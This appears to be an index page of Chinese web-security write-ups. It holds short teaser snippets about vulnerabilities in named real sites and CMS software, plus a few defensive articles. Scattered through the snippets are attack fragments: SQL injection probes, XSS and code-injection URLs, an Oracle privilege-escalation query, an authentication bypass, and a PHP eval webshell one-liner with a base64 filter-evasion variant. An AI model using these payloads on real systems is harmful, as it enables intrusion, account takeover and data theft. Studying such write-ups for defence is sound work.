TOM重要业务系统高危漏洞涉及到多个业务信息系关注热度:22

某重要业务应用系统涉及到多个业务信息系统正常运行，其中危害到skype用户利益。详细说明：TOM在线广告管理系统后台地址（http://yd.ad.tom.com/)目录通过扫描工具暴力破解后得到http://..[详情]

VMware ESX 4双斜线“//”绕过认证 - 网站安全 - 自学关注热度:29

在浏览器访问VMware ESX服务器时，存在双斜线//认证绕过漏洞。https://IP/mob 需要验证https://IP//mob 则可以绕过验证漏洞证明：在浏览器访问VMware ESX服务器地址，需要验证：在服务器地址后面..[详情]

GIMS研究生管理系统SQL注射&上传漏洞(含修复关注热度:31

1、SQL注入，无需登录：2、利用IIS解析漏洞上传：http://www.2cto.com /gmis/xkjsb/dskyinfo/dskyInfoBs1.aspx?id=1导师照片存储方式为 导师代码+.jpg修改页面元素中导师代码的value值为1.asp;1,点重新上传即..[详情]

HDWiKi V4.0.3及HDWiKi V5.1后台上SHELL - 网站安全 - 自学关注热度:45

前几天刚爆了5.1的注入漏洞,在对一个站检测时，发现对方使用的是HDWiKi V 4.0.3版，网上关于模板写马的，好像在这个版本用不了，研究了下，就发现了这个上传WEBshell的方法！详细说明：..[详情]

oracle盲注报错语句和oracle提权语句汇总 - 网站安关注热度:35

and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(lsquo;FOOrsquo;,#39;BARrsquo;,#39;DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATEDECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE.....[详情]

新浪微博appkey泄漏+自动发微博+自动加关注等 -关注热度:67

漏洞:1.有appkey即可调用接口:随便点一个土豆网的分享按钮即可看到土豆网的appkey:appkey=2043051649http://v.t.sina.com.cn/share/share.php?c=spr_web_bd_tudou_weibourl=http%3A%2F%2Fwww.tudou.com%2Fprogr.....[详情]

评论啦Wordpress插件持久XSS及Key远程任意篡改 - 网关注热度:16

1.xss/wp-content/plugins/pinglunla/relay.php?sid=ec51555f3e5e125257457a73609bdbe15cb7c29d/scriptscriptalert(0)/scriptscript%20src=以上URL 用于篡改评论啦的SID, 同时注入任意脚本, 脚本会.....[详情]

记事狗设计缺陷导致可以删除网站任意图片 - 网关注热度:11

路径处理不当导致注册用户可以删除网站上的任意图片详细说明：注册一个用户，登录后点击上传头像，比如地址为：http://www.2cto.com /jishigou30s/index.php?mod=settingscode=face在最后面加上tem..[详情]

新浪微博缺少来源验证或致大面积病毒传播漏洞关注热度:8

顺便结合之前发的自动加关注漏洞,完美结合!详细说明：微数据 发微博缺少来源验证漏洞证明：form action=http://data.weibo.com/mydata/ajax/post method=post id=f2 target=ifr2input name=te.....[详情]

HDWiki 5.1 任意用户密码修改漏洞及修复 - 网站安全关注热度:27

HDWiki重置密码存在一处逻辑漏洞，导致攻击者可以修改任意用户密码。详细说明：control/user.php function dogetpass(){ ...... }elseif(isset($this-post[#39;verifystring#39;])){ $uid=$this-post[.....[详情]

Tp-Link官方网站一个搜索框post注入及修复 - 网站安关注热度:31

http://www.tp-link.com.cn/pages/default.asp搜索框注入，输入#39; and 1=1 and #39;%#39;=#39; 返回所以结果#39; and 1=2 and #39;%#39;=#39; 无返回结果#39; and exists (select * f.....[详情]

天天团购网SQL注射 - 网站安全 - 自学php关注热度:47

其实这个貌似对参数进行了过滤，and,-等关键字都已经被限制，但是，过滤不严格导致了问题：or,select ,#39;,=,,等管关键字未被过滤先找个不从在的关键字http://www.tiantiantuangou.com/team/inde..[详情]

如何防止Apache+PHP环境下虚拟主机被旁注？ - 网站关注热度:21

IIS环境下比较容易实现，可以通过独立匿名访问账户+ NTFS权限来防止。查了一下，Apache下类似IIS的独立虚拟主机账户的方案貌似不太好实现，但有一种更简单的方法：就是在VirtualHost节中..[详情]

Mssql无敌的脱裤技巧 - 网站安全 - 自学php关注热度:90

Msql无敌的脱裤技巧..[详情]

从Jannock渗透小米科技(xiaomi.com)说起 - 网站安全关注热度:17

有人12月份发了小米科技渗透的过程。仔细看了看，非常经典的一次渗透过程，其中注入,上传,社工基本上是无缝结合。现在渗透在外面，有些人看来似乎没有什么技术含量，有些人则认..[详情]

对oschina的一次友情xss测试 - 网站安全 - 自学php关注热度:23

早上起床，发现断网了.大家只能上局域网.另外昨晚友情做的一个xss检查,发现也被红薯删了.这个的xss蠕虫模拟的新浪那个(虽然没代码,功能差不多就行).以前扫osc描漏洞的时候，发现os..[详情]

如何解决繁琐的WEB前端的XSS问题 - 网站安全 - 自关注热度:34

在WEB前端开发的过程中，由于大量的URL和多处使用的传递参数，使得很多开发者经常会留下XSS的漏洞。在安全测试中一旦发现漏洞，必须给开发者开defect。Defect的优先级非常高，必须立..[详情]

AppEngine安全测试思路 - 网站安全 - 自学php关注热度:13

安全测试内容主要是检查是否可以未授权进行资源访问、不同应用间的相互影响、应用本身对云平台的安全影响。1、系统架构第一步了解appengine的自身架构，了解其各个请求处理流、数..[详情]

百万级文件数如何快速查找WebBackDoor? - 网站安全关注热度:23

如果没有保留快照、Hash、时间戳等原始对比信息的话，这个只能遍历了判断文件修改时间的方法不可取，因为攻击者极大可能修改了文件时间。如果遍历的话，高效的处理算法是很关键..[详情]

PHP+MySQL多语句执行 - 网站安全 - 自学php关注热度:33

发起这个帖子，估计就很多人看到题目就表示不屑了。一直以来PHP+MySQL环境下，无论是写程序或者是注入攻击，是无法多语句执行的，这么广为人知的常识，没理由会有人不知道。可权..[详情]

php后门木马常用命令分析 - 网站安全 - 自学php关注热度:19

php后门木马对大家来说一点都不陌生吧，但是它的种类您又知多少呢？php后门木马常用的函数大致上可分为四种类型：1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执..[详情]

远略内容管理系统敏感文件泄露和getshell - 网站关注热度:115

web中的设计缺陷，精简版的fck编辑器修改上传中的设计缺陷。漏洞可以导致入侵者获得一个webshell并导致不正确的访问。详细说明：本漏洞应该说成是程序员或者是维护方偷懒而成的，厂..[详情]

网站站长如何根据经验判定网站是否受到了DDOS攻关注热度:19

做了多年网站，经历过网站遭受攻击的情况，一开始也摸不着头绪，后来在不断的学习摸索中，渐渐地学会了一些判定攻击类型的方法。今天先和大家分享三招判定DDOS攻击的方法，都是..[详情]

Ushahidi 2.2两个缺陷及修复 - 网站安全 - 自学php关注热度:10

标题: Ushahidi 2.2 Multiple Vulnerabilites作者: shpendk www.2cto.com软件地址: http://download.ushahidi.com/影响版本: 2.2测试平台: Xampp on Windows1) CSRF Add Admin PoC:-------------.....[详情]

ManageEngine Support Center Plus 7903版以及下多个缺陷关注热度:22

标题: ManageEngine Support Center Plus =7903 Multiple Vulnerabilities作者：Robert #39;xistence#39; van Hamburg www.2cto.com (xistence[AT]0x90.nl下载地址: http://www.manageengine......[详情]

DeDeCMS v5.7最新漏洞分析 - 网站安全 - 自学php关注热度:17

DeDeCMS（织梦CMS）是一款国内比较专业的PHP网站内容管理系统，从04年发行至今，已近七个年头，也经历了无数次的升级和改版，最新版本为8月12更新的V5.7正式版，功能也不断增强。笔者..[详情]

盒子支付PHP Code Injection及修复方案 - 网站安全关注热度:56

act参数没做过滤，可执行php命令。http://www.iboxpay.com/gc/index.php/index/searchconsignment/act/$%7B@print(md5(admin))%7D漏洞证明：http://www.iboxpay.com/gc/index.php/index/searchconsignment/act/$.....[详情]

21cn邮箱存储型跨站漏洞或致获得cookie或钓鱼 - 网关注热度:23

21cn邮箱没有过滤某种编码（这个叫什么编码来着？反正IE支持）发送邮件内容：img src= http://www.2cto.com /a.jpg style=top:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\2f\78\73\73\2f\29\.....[详情]

新浪邮箱对上传文件后缀及内容未做安全限制导关注热度:30

上传附件那里对上传文件后缀及内容根本没有做安全限制,直接导致上传一些恶意文件导致xss例如伪造的jpg gif 格式文件修复方案：过滤作者 Rookie..[详情]

php一句话猥琐流搞法 - 网站安全 - 自学php关注热度:23

在渗透中常常遇到拦截eval的，所以?php eval($_POST[xiao])?这种形式的会被拦截常见的是变成base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)这种形式可以绕过，另外还有其他形式?php $_GET[#39;eval.....[详情]